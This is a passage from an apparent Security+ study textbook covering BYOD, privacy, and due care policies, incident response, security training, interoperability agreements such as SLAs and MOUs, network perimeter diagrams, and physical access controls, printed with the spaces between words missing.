BringYourOwnDevice(BYOD)PolicyEveryoneseemstohaveasmartphone,atablet,orotherpersonalInternetdevicethattheyuseintheirpersonallives.Bringingthesetoworkisanaturalextensionofone’snormalactivities,butthisraisesthequestionofwhatpoliciesareappropriatebeforeafirmallowsthesedevicestoconnecttothecorporatenetworkandaccesscompanydata.Likeallotherpolicies,planningisneededtodefinetheappropriatepathwaytothecompanyobjectives.Personaldevicesoffercostsavingsandpositiveuser
acceptance,andinmanycasesthesefactorsmakeallowingBYODasensibledecision.TheprimarypurposeofaBYODpolicyistolowertheriskassociated
withconnectingawidearrayofpersonaldevicestoacompany’snetworkandaccessingsensitivedataonthem.Thisplacessecurity,intheformofriskmanagement,asacenterelementofaBYODpolicy.Devicesneedtobemaintainedinacurrent,up-to-datesoftwareposture,andwithcertainsecurityfeatures,suchasscreenlocksandpasswordsenabled.Remotewipeandotherfeaturesshouldbeenabled,andhighlysensitivedata,especiallyinaggregate,shouldnotbeallowedonthedevices.Usersshouldhavespecifictrainingastowhatisallowedandwhatisn’tandshouldbemadeawareoftheincreasedresponsibilityassociatedwithamobilemeansofaccessingcorporateresources.Insomecasesitmaybenecessarytodefineapolicyassociatedwith
personallyowneddevices.Thispolicywilldescribetherulesandregulationsassociatedwithuseofpersonallyowneddeviceswithrespecttocorporatedata,networkconnectivity,andsecurityrisks.
PrivacyPolicyCustomersplaceanenormousamountoftrustinorganizationstowhichtheyprovidepersonalinformation.Thesecustomersexpecttheirinformationtobekeptsecuresothatunauthorizedindividualswillnotgainaccesstoitandsothatauthorizeduserswillnotusetheinformationinunintendedways.Organizationsshouldhaveaprivacypolicythatexplainswhattheirguidingprincipleswillbeinguardingpersonaldatatowhichtheyaregivenaccess.Aspecialcategoryofprivateinformationthatisbecomingincreasingly
importanttodayispersonallyidentifiableinformation(PII).Thiscategoryofinformationincludesanydatathatcanbeusedtouniquelyidentifyanindividual.Thiswouldincludeanindividual’sname,address,driver’slicensenumber,andotherdetails.AnorganizationthatcollectsPIIonitsemployeesandcustomersmustmakesurethatittakesallnecessarymeasurestoprotectthedatafromcompromise.
CrossCheckPrivacyPrivacyisanimportantconsiderationintoday’scomputingenvironment.Assuch,ithasbeengivenitsownchapter,Chapter25.Additionaldetailsonprivacyissuescanbefoundthere.
TechTip
PrudentPersonPrincipleTheconceptsofduecareandduediligenceareconnected.Duecareaddresseswhethertheorganizationhasaminimalsetofpoliciesthatprovidesreasonableassuranceofsuccessinmaintainingsecurity.Duediligencerequiresthatmanagementactuallydosomethingtoensuresecurity,suchasimplementproceduresfortestingandreviewofauditrecords,internalsecuritycontrols,andpersonnelbehavior.Thestandardappliedisoneofa“prudentperson”;wouldaprudentpersonfindtheactionsappropriateandsincere?Toapplythisstandard,allonehastodoisaskthefollowingquestionfortheissueunderconsideration:“Whatwouldaprudentpersondotoprotectandensurethatthesecurityfeaturesandproceduresareworkingoradequate?”Failureofasecurityfeatureorproceduredoesn’tnecessarilymeanthepersonactedimprudently.
DueCareandDueDiligenceDuecareandduediligencearetermsusedinthelegalandbusinesscommunitytodefinereasonablebehavior.Basically,thelawrecognizestheresponsibilityofanindividualororganizationtoactreasonablyrelativetoanotherparty.IfpartyAallegesthattheactionsofpartyBhavecauseditlossorinjury,partyAmustprovethatpartyBfailedtoexerciseduecareorduediligenceandthatthisfailureresultedinthelossorinjury.Thesetermsoftenareusedsynonymously,butduecaregenerallyreferstothestandardofcareareasonablepersonisexpectedtoexerciseinallsituations,whereasduediligencegenerallyreferstothestandardofcareabusinessisexpectedtoexerciseinpreparationforabusinesstransaction.Anorganizationmusttakereasonableprecautionsbeforeenteringa
businesstransactionoritmightbefoundtohaveactedirresponsibly.Intermsofsecurity,organizationsareexpectedtotakereasonableprecautionstoprotecttheinformationthattheymaintainonindividuals.Shouldapersonsufferalossasaresultofnegligenceonthepartofanorganizationintermsofitssecurity,thatpersontypicallycanbringalegalsuitagainsttheorganization.Thestandardapplied—reasonableness—isextremelysubjectiveand
oftenisdeterminedbyajury.Theorganizationwillneedtoshowthatithadtakenreasonableprecautionstoprotecttheinformation,andthat,despitetheseprecautions,anunforeseensecurityeventoccurredthatcausedtheinjurytotheotherparty.Sincethisissosubjective,itishardtodescribewhatwouldbeconsideredreasonable,butmanysectorshaveasetof“securitybestpractices”fortheirindustry,whichprovidesabasisfororganizationsinthatsectortostartfrom.Iftheorganizationdecidesnottofollowanyofthebestpracticesacceptedbytheindustry,itneedstobepreparedtojustifyitsreasonsincourtshouldanincidentoccur.Ifthesectortheorganizationisinhasregulatoryrequirements,justifyingwhythemandatedsecuritypracticeswerenotfollowedwillbemuchmoredifficult(ifnotimpossible).
Duediligenceistheapplicationofaspecificstandardofcare.Duecareisthedegreeofcarethatanordinarypersonwouldexercise.
DueProcessDueprocessisconcernedwithguaranteeingfundamentalfairness,justice,andlibertyinrelationtoanindividual’slegalrights.IntheUnitedStates,dueprocessisconcernedwiththeguaranteeofanindividual’srightsasoutlinedbytheConstitutionandBillofRights.Proceduraldueprocessisbasedontheconceptofwhatis“fair.”Alsoofinterestistherecognitionbycourtsofaseriesofrightsthatarenotexplicitlyspecifiedbythe
ConstitutionbutthatthecourtshavedecidedareimplicitintheconceptsembodiedbytheConstitution.Anexampleofthisisanindividual’srighttoprivacy.Fromanorganization’spointofview,dueprocessmaycomeintoplayduringanadministrativeactionthatadverselyaffectsanemployee.Beforeanemployeeisterminated,forexample,werealloftheemployee’srightsprotected?Anactualexamplepertainstotherightsofprivacyregardingemployees’e-mailmessages.Asthenumberofcasesinvolvingemployersexaminingemployeee-mailsgrows,caselawcontinuestobeestablishedandthecourtseventuallywillsettleonwhatrightsanemployeecanexpect.ThebestthinganemployercandoiffacedwiththissortofsituationistoworkcloselywithHRstafftoensurethatappropriatepoliciesarefollowedandthatthosepoliciesareinkeepingwithcurrentlawsandregulations.
IncidentResponsePoliciesandProceduresNomatterhowcarefulanorganizationis,eventuallyasecurityincidentofsomesortwilloccur.Whenithappens,howeffectivelytheorganizationrespondstoitwilldependgreatlyonhowprepareditistohandleincidents.Anincidentresponsepolicyandassociatedproceduresshouldbedevelopedtooutlinehowtheorganizationwillprepareforsecurityincidentsandrespondtothemwhentheyoccur.Waitinguntilanincidenthappensisnottherighttimetoestablishyourpolicies—theyneedtobedesignedinadvance.Theincidentresponsepolicyshouldcoverfivephases:preparation,detection,containmentanderadication,recovery,andfollow-upactions.
CrossCheckIncidentResponseIncidentresponseiscoveredindetailinChapter22.Thissectionservesonlyasanintroductiontopolicyelementsassociatedwiththetopic.Forcompletedetailsonincidentresponse,pleaseexamineChapter22.
SecurityAwarenessandTrainingSecurityawarenessandtrainingprogramscanenhanceanorganization’ssecuritypostureintwodirectways.First,theyteachpersonnelhowtofollowthecorrectsetofactionstoperformtheirdutiesinasecuremanner.Second,theymakepersonnelawareoftheindicatorsandeffectsofsocialengineeringattacks.Therearemanytasksthatemployeesperformthatcanhaveinformation
securityramifications.Properlytrainedemployeesareabletoperformtheirdutiesinamoreeffectivemanner,includingtheirdutiesassociatedwithinformationsecurity.Theextentofinformationsecuritytrainingwillvarydependingontheorganization’senvironmentandthelevelofthreat,butinitialemployeesecuritytrainingatthetimeofbeinghiredisimportant,asisperiodicrefreshertraining.Astrongsecurityeducationandawarenesstrainingprogramcangoalongwaytowardreducingthechancethatasocialengineeringattackwillbesuccessful.Securityawarenessprogramsandcampaigns,whichmightincludeseminars,videos,posters,newsletters,andsimilarmaterials,arealsofairlyeasytoimplementandarenotverycostly.
SecurityPolicyTrainingandProceduresPersonnelcannotbeexpectedtoperformcomplextaskswithouttrainingwithrespecttothetasksandexpectations.Thisappliesbothtothesecuritypolicyandtooperationalsecuritydetails.Ifemployeesaregoingtobeexpectedtocomplywiththeorganization’ssecuritypolicy,theymustbeproperlytrainedinitspurpose,meaning,andobjectives.Trainingwithrespecttotheinformationsecuritypolicy,individualresponsibilities,andexpectationsissomethingthatrequiresperiodicreinforcementthroughrefreshertraining.Becausethesecuritypolicyisahigh-leveldirectivethatsetstheoverall
supportandexecutivedirectionwithrespecttosecurity,itisimportantthatthemeaningofthismessagebetranslatedandsupported.Second-level
policiessuchaspassword,access,informationhandling,andacceptableusepoliciesalsoneedtobecovered.Thecollectionofpoliciesshouldpaintapicturedescribingthedesiredsecuritycultureoftheorganization.Thetrainingshouldbedesignedtoensurethatpeopleseeandunderstandthewholepicture,notjusttheelements.
Role-basedTrainingFortrainingtobeeffective,itneedstobetargetedtotheuserwithregardtotheirroleinthesubjectofthetraining.Whileallemployeesmayneedgeneralsecurityawarenesstraining,theyalsoneedspecifictraininginareaswheretheyhaveindividualresponsibilities.Role-basedtrainingwithregardtoinformationsecurityresponsibilitiesisanimportantpartofinformationsecuritytraining.Ifapersonhasjobresponsibilitiesthatmayimpactinformationsecurity,
thenrole-specifictrainingisneededtoensurethattheindividualunderstandstheresponsibilitiesastheyrelatetoinformationsecurity.Someroles,suchassystemadministratorordeveloper,haveclearlydefinedinformationsecurityresponsibilities.Therolesofothers,suchasprojectmanagerorpurchasingmanager,haveinformationsecurityimpactsthatarelessobvious,buttheserolesrequiretrainingaswell.Infact,theless-obviousbutwider-impactrolesofmiddlemanagementcanhavealargeeffectontheinformationsecurityculture,andthusifaspecificoutcomeisdesired,itrequirestraining.Asinallpersonnel-relatedtraining,twoelementsneedattention.First,
retrainingovertimeisnecessarytoensurethatpersonnelkeepproperlevelsofknowledge.Second,aspeoplechangejobs,areassessmentoftherequiredtrainingbasisisneeded,andadditionaltrainingmayberequired.Maintainingaccuratetrainingrecordsofpersonnelistheonlywaythiscanbemanagedinanysignificantenterprise.
CompliancewithLaws,BestPractices,and
StandardsThereisawidearrayoflaws,regulations,contractualrequirements,standards,andbestpracticesassociatedwithinformationsecurity.Eachplacesitsownsetofrequirementsuponanorganizationanditspersonnel.Theonlyeffectivewayforanorganizationtoaddresstheserequirementsistobuildthemintotheirownpoliciesandprocedures.Trainingtoone’sownpoliciesandprocedureswouldthentranslateintocoverageoftheseexternalrequirements.Itisimportanttonotethatmanyoftheseexternalrequirementsimparta
specifictrainingandawarenesscomponentupontheorganization.OrganizationssubjecttotherequirementsofthePaymentCardIndustryDataSecurityStandard(PCIDSS),GrammLeachBlileyAct(GLBA),orHealthInsurancePortabilityAccountabilityAct(HIPAA)areamongthemanythatmustmaintainaspecificinformationsecuritytrainingprogram.Otherorganizationsshoulddosoasamatterofbestpractice.
UserHabitsIndividualuserresponsibilitiesvarybetweenorganizationsandthetypeofbusinesseachorganizationisinvolvedin,buttherearecertainverybasicresponsibilitiesthatallusersshouldbeinstructedtoadopt:
Lockthedoortoyourofficeorworkspace,includingdrawersandcabinets.
Donotleavesensitiveinformationinsideyourcarunprotected.
Securestoragemediacontainingsensitiveinformationinasecurestoragedevice.
Shredpapercontainingorganizationalinformationbeforediscardingit.
Donotdivulgesensitiveinformationtoindividuals(includingotheremployees)whodonothaveanauthorizedneedtoknowit.
Donotdiscusssensitiveinformationwithfamilymembers.(ThemostcommonviolationofthisruleoccursinregardtoHRinformation,asemployees,especiallysupervisors,maycomplaintotheirspouseorfriendsaboutotheremployeesoraboutproblemsthatareoccurringatwork.)
Protectlaptopsandothermobiledevicesthatcontainsensitiveorimportantorganizationinformationwhereverthedevicemaybestoredorleft.(It’sagoodideatoensurethatsensitiveinformationisencryptedonthelaptopormobiledevicesothat,shouldtheequipmentbelostorstolen,theinformationremainssafe.)
Beawareofwhoisaroundyouwhendiscussingsensitivecorporateinformation.Doeseverybodywithinearshothavetheneedtohearthisinformation?
Enforcecorporateaccesscontrolprocedures.Bealertto,anddonotallow,piggybacking,shouldersurfing,oraccesswithoutthepropercredentials.
Beawareofthecorrectprocedurestoreportsuspectedoractualviolationsofsecuritypolicies.
Followproceduresestablishedtoenforcegoodpasswordsecuritypractices.Passwordsaresuchacriticalelementthattheyarefrequentlytheultimatetargetofasocialengineeringattack.Thoughsuchpasswordproceduresmayseemtoooppressiveorstrict,theyareoftenthebestlineofdefense.
Userhabitsareafront-linesecuritytoolinengagingtheworkforcetoimprovetheoverallsecuritypostureofanorganization.
UserresponsibilitiesareeasytrainingtopicsaboutwhichtoaskquestionsontheCompTIASecurity+exam,socommittomemoryyourknowledgeofthepointslistedhere.
NewThreatsandSecurityTrends/AlertsAttheendoftheday,informationsecuritypracticesareaboutmanagingrisk,anditiswellknownthattheriskenvironmentisonemarkedbyconstantchange.Theever-evolvingthreatenvironmentfrequentlyencountersnewthreats,newsecurityissues,andnewformsofdefense.Trainingpeopletorecognizethenewthreatsnecessitatescontinualawarenessandtrainingrefresherevents.
NewVirusesNewformsofviruses,ormalware,arebeingcreatedeveryday.Someofthesenewformscanbehighlydestructiveandcostly,anditisincumbentuponalluserstobeonthelookoutforandtakeactionstoavoidexposure.Pooruserpracticesarecountedonbymalwareauthorstoassistinthespreadoftheirattacks.Onewayofexplainingproperactionstousersistouseananalogytocleanliness.Traininguserstopracticegoodhygieneintheiractionscangoalongwaytowardassistingtheenterpriseindefendingagainsttheseattackvectors.
PhishingAttacksThebestdefenseagainstphishingandothersocialengineeringattacksisaneducatedandawarebodyofemployees.Continualrefreshertrainingaboutthetopicofsocialengineeringandspecificsaboutcurrentattacktrendsareneededtokeepemployeesawareofandpreparedfornewtrendsinsocialengineeringattacks.Attackersrelyuponanuneducated,complacent,ordistractedworkforcetoenabletheirattackvector.Socialengineeringhasbecomethegatewayformanyofthemostdamagingattacksinplaytoday.SocialengineeringiscoveredextensivelyinChapter4.
SocialNetworkingandP2PWiththeriseinpopularityofpeer-to-peer(P2P)communicationsand
socialnetworkingsites—notablyFacebook,Twitter,andLinkedIn—manypeoplehavegottenintoahabitofsharingtoomuchinformation.Usingastatusof“ReturningfromsalescalltoXYZcompany”revealsinformationtopeoplewhohavenoneedtoknowthisinformation.Confusingsharingwithfriendsandsharingbusinessinformationwiththosewhodon’tneedtoknowisalinepeoplearecrossingonaregularbasis.Don’tbetheemployeewhomixesbusinessandpersonalinformationandreleasesinformationtopartieswhoshouldnothaveit,regardlessofhowinnocuousitmayseem.Usersneedtounderstandtheimportanceofnotusingcommonprograms
suchastorrentsandotherfilesharingintheworkplace,astheseprogramscanresultininfectionmechanismsanddata-losschannels.Theinformationsecuritytrainingandawarenessprogramshouldcovertheseissues.Iftheissuesareproperlyexplainedtoemployees,theirmotivationtocomplywon’tsimplybetoavoidadversepersonnelactionforviolatingapolicy;theywillwanttoassistinthesecurityoftheorganizationanditsmission.
TrainingMetricsandComplianceTrainingandawarenessprogramscanyieldmuchinthewayofaneducatedandknowledgeableworkforce.Manylaws,regulations,andbestpracticeshaverequirementsformaintainingatrainedworkforce.Havingarecord-keepingsystemtomeasurecompliancewithattendanceandtomeasuretheeffectivenessofthetrainingisanormalrequirement.Simplyconductingtrainingisnotsufficient.Followingupandgatheringtrainingmetricstovalidatecomplianceandsecuritypostureisanimportantaspectofsecuritytrainingmanagement.Anumberoffactorsdeserveattentionwhenmanagingsecuritytraining.
Becauseofthediversenatureofrole-basedrequirements,maintaininganactive,up-to-datelistingofindividualtrainingandretrainingrequirementsisonechallenge.Monitoringtheeffectivenessofthetrainingisyetanotherchallenge.Creatinganeffectivetrainingandawarenessprogramwhen
measuredbyactualimpactonemployeebehaviorisachallengingendeavor.Trainingneedstobecurrent,relevant,andinterestingtoengageemployeeattention.Simplerepetitionofthesametrainingmaterialhasnotproventobeeffective,soregularlyupdatingtheprogramisarequirementifitistoremaineffectiveovertime.
TechTip
SecurityTrainingRecordsRequirementsforbothperiodictrainingandretrainingdrivetheneedforgoodtrainingrecords.Maintainingproperinformationsecuritytrainingrecordsisarequirementofseverallawsandregulationsandshouldbeconsideredabestpractice.
InteroperabilityAgreementsManybusinessoperationsinvolveactionsbetweenmanydifferentparties—somewithinanorganization,andsomeindifferentorganizations.Theseactionsrequirecommunicationbetweentheparties,definingtheresponsibilitiesandexpectationsoftheparties,thebusinessobjectives,andtheenvironmentwithinwhichtheobjectiveswillbepursued.Toensureanagreementisunderstoodbetweentheparties,writtenagreementsareused.Numerousformsoflegalagreementsandcontractsareusedinbusiness,butwithrespecttosecurity,someofthemostcommononesaretheservicelevelagreement,businesspartnershipagreement,memorandumofunderstanding,andinterconnectionsecurityagreement.
ServiceLevelAgreementsServicelevelagreements(SLAs)arecontractualagreementsbetweenentitiesthatdescribespecifiedlevelsofservicethattheservicingentityagreestoguaranteeforthecustomer.SLAsessentiallysettherequisite
levelofperformanceofagivencontractualservice.SLAsaretypicallyincludedaspartofaservicecontractandsettheleveloftechnicalexpectations.AnSLAcandefinespecificservices,theperformancelevelassociatedwithaservice,issuemanagementandresolution,andsoon.SLAsarenegotiatedbetweencustomerandsupplierandrepresenttheagreed-uponterms.Anorganizationcontractingwithaserviceprovidershouldremembertoincludeintheagreementasectiondescribingtheserviceprovider’sresponsibilityintermsofbusinesscontinuityanddisasterrecovery.Theprovider’sbackupplansandprocessesforrestoringlostdatashouldalsobeclearlydescribed.Typically,agoodSLAwillsatisfytwosimplerules.First,itwill
describetheentiresetofproductorservicefunctionsinsufficientdetailthattheirrequirementwillbeunambiguous.Second,theSLAwillprovideaclearmeansofdeterminingwhetheraspecifiedfunctionorservicehasbeenprovidedattheagreed-uponlevelofperformance.
BusinessPartnershipAgreementAbusinesspartnershipagreement(BPA)isalegalagreementbetweenpartnersestablishingtheterms,conditions,andexpectationsoftherelationshipbetweenthepartners.Thesedetailscancoverawiderangeofissues,includingtypicalitemssuchasthesharingofprofitsandlosses,theresponsibilitiesofeachpartner,theadditionorremovalofpartners,andanyotherissues.TheUniformPartnershipAct(UPA),establishedbystatelawandconvention,laysoutauniformsetofrulesassociatedwithpartnershipstoresolveanypartnershipterms.ThetermsinaUPAaredesignedas“onesizefitsall”andarenottypicallyinthebestinterestofanyspecificpartnership.ToavoidundesiredoutcomesthatmayresultfromUPAterms,itisbestforpartnershipstospelloutspecificsinaBPA.
MemorandumofUnderstandingAmemorandumofunderstanding(MOU)isalegaldocumentusedto
describeabilateralagreementbetweenparties.Itisawrittenagreementexpressingasetofintendedactionsbetweenthepartieswithrespecttosomecommonpursuitorgoal.Itismoreformalanddetailedthanasimplehandshake,butitgenerallylacksthebindingpowersofacontract.ItisalsocommontofindMOUsbetweendifferentunitswithinanorganizationtodetailexpectationsassociatedwiththecommonbusinessinterest.
InterconnectionSecurityAgreementAninterconnectionsecurityagreement(ISA)isaspecializedagreementbetweenorganizationsthathaveinterconnectedITsystems,thepurposeofwhichistodocumentthesecurityrequirementsassociatedwiththeinterconnection.AnISAcanbeapartofanMOUdetailingthespecifictechnicalsecurityaspectsofadatainterconnection.
BesureyouunderstandthedifferencesbetweentheinteroperabilityagreementsSLA,BPA,MOU,andISA.Thedifferenceshingeuponthepurposeforeachdocument.
TheSecurityPerimeterThediscussiontothispointhasnotincludedanymentionofthespecifictechnologyusedtoenforceoperationalandorganizationalsecurityoradescriptionofthevariouscomponentsthatconstitutetheorganization’ssecurityperimeter.Iftheaverageadministratorwereaskedtodrawadiagramdepictingthevariouscomponentsoftheirnetwork,thediagramwouldprobablylooksomethinglikeFigure3.1.
•Figure3.1Basicdiagramofanorganization’snetwork
Thesecurityperimeter,withitsseverallayersofsecurity,alongwithadditionalsecuritymechanismsthatmaybeimplementedoneachsystem(suchasuserIDs/passwords),createswhatissometimesknownasdefense-in-depth.Thisimpliesthatsecurityisenhancedwhentherearemultiplelayersofsecurity(thedepth)throughwhichanattackerwouldhavetopenetratetoreachthedesiredgoal.
Thisdiagramincludesthemajorcomponentstypicallyfoundinanetwork.TheconnectiontotheInternetgenerallyhassomesortofprotectionattachedtoitsuchasafirewall.Anintrusiondetectionsystem(IDS),alsooftenpartofthesecurityperimeterfortheorganization,maybeeitherontheinsideortheoutsideofthefirewall,oritmayinfactbeonbothsides.Thespecificlocationdependsonthecompanyandwhatitis
moreconcernedaboutpreventing(thatis,insiderthreatsorexternalthreats).Theroutercanalsobethoughtofasasecuritydevice,asitcanbeusedtoenhancesecuritysuchasinthecaseofwirelessroutersthatcanbeusedtoenforceencryptionsettings.Beyondthissecurityperimeteristhecorporatenetwork.Figure3.1isobviouslyaverysimpledepiction—anactualnetworkcanhavenumeroussubnetsandextranetsaswellaswirelessaccesspoints—butthebasiccomponentsarepresent.Unfortunately,ifthiswerethediagramprovidedbytheadministratortoshowtheorganization’sbasicnetworkstructure,theadministratorwouldhavemissedaveryimportantcomponent.AmoreastuteadministratorwouldprovideadiagrammorelikeFigure3.2.
•Figure3.2Amorecompletediagramofanorganization’snetwork
Thisdiagramincludesotherpossibleaccesspointsintothenetwork,includingthepublicswitchedtelephonenetwork(PSTN)andwirelessaccesspoints.Theorganizationmayormaynothaveanyauthorizedmodemsorwirelessnetworks,butthesavvyadministratorwouldrealizethatthepotentialexistsforunauthorizedversionsofboth.Whenconsideringthepolicies,procedures,andguidelinesneededtoimplement
securityfortheorganization,bothnetworksneedtobeconsidered.AnotherdevelopmentthathasbroughtthetelephoneandcomputernetworkstogetheristheimplementationofvoiceoverIP(VoIP),whicheliminatesthetraditionallandlinesinanorganizationandreplacesthemwithspecialtelephonesthatconnecttotheIPdatanetwork.WhileFigure3.2providesamorecomprehensiveviewofthevarious
componentsthatneedtobeprotected,itisstillincomplete.Mostexpertswillagreethatthebiggestdangertoanyorganizationdoesnotcomefromexternalattacksbutratherfromtheinsider—adisgruntledemployeeorsomebodyelsewhohasphysicalaccesstothefacility.Givenphysicalaccesstoanoffice,theknowledgeableattackerwillquicklyfindtheinformationneededtogainaccesstotheorganization’scomputersystemsandnetwork.Consequently,everyorganizationalsoneedssecuritypolicies,procedures,andguidelinesthatcoverphysicalsecurity,andeverysecurityadministratorshouldbeconcernedwiththeseaswell.Whilephysicalsecurity(whichcanincludesuchthingsaslocks,cameras,guardsandentrypoints,alarmsystems,andphysicalbarriers)willprobablynotfallunderthepurviewofthesecurityadministrator,theoperationalstateoftheorganization’sphysicalsecuritymeasuresisjustasimportantasmanyoftheothernetwork-centricmeasures.
AnincreasingnumberoforganizationsareimplementingVoIPsolutionstobringthetelephoneandcomputernetworkstogether.Whiletherearesometremendousadvantagestodoingthisintermsofbothincreasedcapabilitiesandpotentialmonetarysavings,bringingthetwonetworkstogethermayalsointroduceadditionalsecurityconcerns.Anothercommonmethodtoaccessorganizationalnetworkstodayisthroughwirelessaccesspoints.Thesemaybeprovidedbytheorganizationitselftoenhanceproductivity,ortheymaybeattachedtothenetworkbyuserswithoutorganizationalapproval.Theimpactofalloftheseadditionalmethodsthatcanbeusedtoaccessanetworkistoincreasethecomplexityofthesecurityproblem.
PhysicalSecurity
Physicalsecurityconsistsofallmechanismsusedtoensurethatphysicalaccesstothecomputersystemsandnetworksisrestrictedtoonlyauthorizedusers.Additionalphysicalsecuritymechanismsmaybeusedtoprovideincreasedsecurityforespeciallysensitivesystemssuchasserversanddevicessuchasrouters,firewalls,andintrusiondetectionsystems.Whenconsideringphysicalsecurity,accessfromallsixsidesshouldbeconsidered—notonlyshouldthesecurityofobviouspointsofentrybeexamined,suchasdoorsandwindows,butthewallsthemselvesaswellasthefloorandceilingshouldalsobeconsidered.Questionssuchasthefollowingshouldbeaddressed:
Isthereafalseceilingwithtilesthatcanbeeasilyremoved?
Dothewallsextendtotheactualceilingoronlytoafalseceiling?
Istherearaisedfloor?
Dothewallsextendtotheactualfloor,ordotheystopataraisedfloor?
Howareimportantsystemssituated?
Dothemonitorsfaceawayfromwindows,orcouldtheactivityofsomebodyatasystembemonitored?
Whohasaccesstothefacility?
Whattypeofaccesscontrolisthere,andarethereanyguards?
Whoisallowedunsupervisedaccesstothefacility?
Isthereanalarmsystemorsecuritycamerathatcoversthearea?
Whatproceduresgovernthemonitoringofthealarmsystemorsecuritycameraandtheresponseshouldunauthorizedactivitybedetected?
Thesearejustsomeofthenumerousquestionsthatneedtobeaskedwhenexaminingthephysicalsecuritysurroundingasystem.
TechTip
PhysicalSecurityIsAlsoImportanttoComputerSecurityComputersecurityprofessionalsrecognizethattheycannotrelyonlyoncomputersecuritymechanismstokeeptheirsystemssafe.Physicalsecuritymustbemaintainedaswell,becauseinmanycases,ifanattackergainsphysicalaccess,hecanstealdataanddestroythesystem.
PhysicalAccessControlsThepurposeofphysicalaccesscontrolsisthesameasthatofcomputerandnetworkaccesscontrols—youwanttorestrictaccesstoonlythosewhoareauthorizedtohaveit.Physicalaccessisrestrictedbyrequiringtheindividualtosomehowauthenticatethattheyhavetherightorauthoritytohavethedesiredaccess.Asincomputerauthentication,accessinthephysicalworldcanbebasedonsomethingtheindividualhas,somethingtheyknow,orsomethingtheyare.Frequently,whendealingwiththephysicalworld,theterms“authentication”and“accesscontrol”areusedinterchangeably.Themostcommonphysicalaccesscontroldevice,whichhasbeen
aroundinsomeformforcenturies,isalock.Combinationlocksrepresentanaccesscontroldevicethatdependsonsomethingtheindividualknows(thecombination).Lockswithkeysdependonsomethingtheindividualhas(thekey).Eachofthesehascertainadvantagesanddisadvantages.Combinationsdon’trequireanyextrahardware,buttheymustberemembered(whichmeansindividualsmaywritethemdown—asecurityvulnerabilityinitself)andarehardtocontrol.Anybodywhoknowsthecombinationmayprovideittosomebodyelse.Keylocksaresimpleandeasytouse,butthekeymaybelost,whichmeansanotherkeyhastobemadeorthelockhastoberekeyed.Keysmayalsobecopied,andtheirdisseminationcanbehardtocontrol.Newerlocksreplacethetraditionalkeywithacardthatmustbepassedthroughareaderorplacedagainstit.Theindividualmayalsohavetoprovideapersonalaccesscode,thus
makingthisformofaccessbothasomething-you-knowandsomething-you-havemethod.
TechTip
PhysicalandInformationSecurityConvergenceInhigh-securitysites,physicalaccesscontrolsandelectronicaccesscontrolstoinformationareinterlocked.Thismeansthatbeforedatacanbeaccessedfromaparticularmachine,thephysicalaccesscontrolsystemmustagreewiththefindingthattheauthorizedpartyispresent.
Inadditiontolocksondoors,othercommonphysicalsecuritydevicesincludevideosurveillanceandevensimpleaccesscontrollogs(sign-inlogs).Whilesign-inlogsdon’tprovideanactualbarrier,theydoprovidearecordofaccessand,whenusedinconjunctionwithaguardwhoverifiesanindividual’sidentity,candissuadepotentialadversariesfromattemptingtogainaccesstoafacility.Asmentioned,anothercommonaccesscontrolmechanismisahumansecurityguard.Manyorganizationsemployaguardtoprovideanextralevelofexaminationofindividualswhowanttogainaccesstoafacility.Otherdevicesarelimitedtotheirdesignedfunction.Ahumanguardcanapplycommonsensetosituationsthatmighthavebeenunexpected.Havingsecurityguardsalsoaddressesthecommonpracticeofpiggybacking(akatailgating),whereanindividualfollowsanotherpersoncloselytoavoidhavingtogothroughtheaccesscontrolprocedures.
BiometricsAccesscontrolsthatutilizesomethingyouknow(forexample,combinations)orsomethingyouhave(suchaskeys)arenottheonlymethodstolimitfacilityaccesstoauthorizedindividuals.Athirdapproachistoutilizesomethinguniqueabouttheindividual—theirfingerprints,forexample—toidentifythem.Unliketheothertwomethods,thesomething-you-aremethod,knownasbiometrics,doesnotrelyontheindividualto
eitherremembersomethingortohavesomethingintheirpossession.Biometricsisamoresophisticatedaccesscontrolapproachandcanbemoreexpensive.Biometricsalsosufferfromfalsepositivesandfalsenegatives,makingthemlessthan100percenteffective.Forthisreasontheyarefrequentlyusedinconjunctionwithanotherformofauthentication.Theadvantageistheuseralwayshasthem(cannotleaveathomeorshare)andtheytendtohavebetterentropythanpasswords.Othermethodstoaccomplishbiometricsincludehandwritinganalysis,retinalscans,irisscans,voiceprints,handgeometry,andfacialgeometry.
Therearemanysimilaritiesbetweenauthenticationandaccesscontrolsincomputersandinthephysicalworld.Rememberthethreecommontechniquesforverifyingaperson’sidentityandaccessprivileges:somethingyouknow,somethingyouhave,andsomethingaboutyou.
Bothaccesstocomputersystemsandnetworksandphysicalaccesstorestrictedareascanbecontrolledwithbiometrics.However,biometricmethodsforcontrollingphysicalaccessaregenerallynotthesameasthoseemployedforrestrictingaccesstocomputersystemsandnetworks.Handgeometry,forexample,requiresafairlylargedevice.Thiscaneasilybeplacedoutsideofadoortocontrolaccesstotheroombutwouldnotbeasconvenienttocontrolaccesstoacomputersystem,sinceareaderwouldneedtobeplacedwitheachcomputeroratleastwithgroupsofcomputers.Inamobileenvironmentwherelaptopsarebeingused,adevicesuchasahandgeometryreaderwouldbeunrealistic.
TechTip
BiometricDevicesOnceonlyseeninspyorsciencefictionmovies,biometricssuchashandandfingerprintreaders,eye-scanningtechnology,andvoiceprintdevicesarenowbecomingmorecommonintherealworld.Theaccuracyofthesedeviceshasimprovedandthecostshavedropped,
makingthemrealisticsolutionstomanyaccesscontrolsituations.
PhysicalBarriersAnevenmorecommonsecurityfeaturethanlocksisaphysicalbarrier.Physicalbarriershelpimplementthephysical-worldequivalentoflayeredsecurity.Theoutermostlayerofphysicalsecurityshouldcontainthemorepubliclyvisibleactivities.Aguardatagateinafence,forexample,wouldbevisiblebyallwhohappentopassby.Asyouprogressthroughthelayers,thebarriersandsecuritymechanismsshouldbecomelesspubliclyvisibletomakedeterminingwhatmechanismsareinplacemoredifficultforobservers.Signsarealsoanimportantelementinsecurity,astheyannouncetothepublicwhichareasarepublicandwhichareprivate.Amantrapcanalsobeusedinthislayeredapproach.Itgenerallyconsistsofasmallspacethatislargeenoughforonlyonepersonatatime,withtwolockingdoors.Anindividualhastoenterthefirstdoor,closethefirstdoor,thenattempttoopentheseconddoor.Ifunsuccessful,perhapsbecausetheydonothavetheproperaccesscode,thepersoncanbecaughtinsidethissmalllocationuntilsecuritypersonnelshowup.Inadditiontowallsandfences,openspacecanalsoserveasabarrier.
